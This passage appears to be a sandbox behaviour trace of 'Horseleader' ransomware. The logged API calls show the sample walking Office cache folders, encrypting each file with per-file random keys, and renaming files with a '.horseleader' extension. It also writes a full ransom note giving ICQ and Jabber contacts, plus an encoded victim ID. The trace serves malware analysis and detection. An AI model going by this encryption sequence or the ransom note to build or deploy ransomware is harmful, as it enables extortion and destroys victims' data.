Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".testttjffg") returned 0x0 [0136.302] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0136.303] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0136.303] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0136.304] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0136.304] StrStrW (lpFirst="PowerPointMUI.xml", lpSrch=".txt") returned 0x0 [0136.304] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1450) returned 1 [0136.304] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5aa, lpOverlapped=0x0) returned 1 [0136.481] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.481] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5aa, lpOverlapped=0x0) returned 1 [0136.481] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.482] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0136.482] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0136.482] CloseHandle (hObject=0x21c) returned 1 [0136.486] GetProcessHeap () returned 0x780000 [0136.486] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0136.486] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.horseleader") returned 96 [0136.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.horseleader")) returned 1 [0136.491] GetProcessHeap () returned 0x780000 [0136.491] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0136.491] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0136.492] lstrcmpiW 
(lpString1="PptLR.cab", lpString2="Windows") returned -1 [0136.492] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0136.492] StrStrIW (lpFirst="PptLR.cab", lpSrch=".horseleader") returned 0x0 [0136.492] lstrcmpW (lpString1="PptLR.cab", lpString2="#Decrypt#.txt") returned 1 [0136.492] lstrcmpW (lpString1="PptLR.cab", lpString2="_uninstalling_.png") returned 1 [0136.492] lstrlenW (lpString=".testttjffg") returned 11 [0136.492] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".testttjffg") returned 0x0 [0136.492] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0136.493] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0136.493] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0136.494] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0136.494] StrStrW (lpFirst="PptLR.cab", lpSrch=".txt") returned 0x0 [0136.495] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=70361744) returned 1 [0136.495] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.495] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0136.595] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.595] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0136.595] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x218a948, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.595] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0137.090] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.090] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0137.090] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4315290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.090] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0137.119] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.120] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0137.120] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.120] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0137.120] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0137.121] CloseHandle (hObject=0x21c) returned 1 [0143.868] GetProcessHeap () returned 0x780000 [0143.869] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0143.869] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.horseleader") returned 88 [0143.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.horseleader")) returned 1 [0143.871] GetProcessHeap () returned 0x780000 [0143.871] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0143.871] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, 
ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0143.871] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0143.871] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0143.871] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0143.871] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0143.871] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0143.871] lstrlenW (lpString=".testttjffg") returned 11 [0143.871] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0143.871] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0143.872] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0143.872] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0143.873] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0143.873] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0143.873] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1886) returned 1 [0143.873] ReadFile (in: hFile=0x21c, 
lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x75e, lpOverlapped=0x0) returned 1 [0143.875] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff8a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.876] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x75e, lpOverlapped=0x0) returned 1 [0143.876] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.876] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0143.876] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0143.877] CloseHandle (hObject=0x21c) returned 1 [0143.879] GetProcessHeap () returned 0x780000 [0143.879] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0143.879] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0143.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all 
users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0143.881] GetProcessHeap () returned 0x780000 [0143.881] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0143.881] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0143.881] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0143.881] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0143.881] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0143.882] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0143.882] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0143.884] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0143.884] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0143.884] CloseHandle (hObject=0x1cc) returned 1 [0143.885] 
GetProcessHeap () returned 0x780000 [0143.885] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0143.885] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0143.885] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0143.885] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned 66 [0143.885] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0143.885] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0143.885] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0143.885] GetProcessHeap () returned 0x780000 [0143.885] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0143.885] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*") returned 68 [0143.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, 
ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0143.955] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0143.955] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.") returned 68 [0143.956] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0143.956] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0143.956] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0143.956] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0143.956] lstrlenW (lpString=".testttjffg") returned 11 [0143.956] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0143.956] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0143.956] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0143.957] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.957] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0143.957] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0143.957] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\..") returned 69 [0143.957] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0143.957] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0143.957] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0143.957] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0143.958] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0143.958] lstrlenW (lpString=".testttjffg") returned 11 [0143.958] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0143.958] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0143.958] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0143.958] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
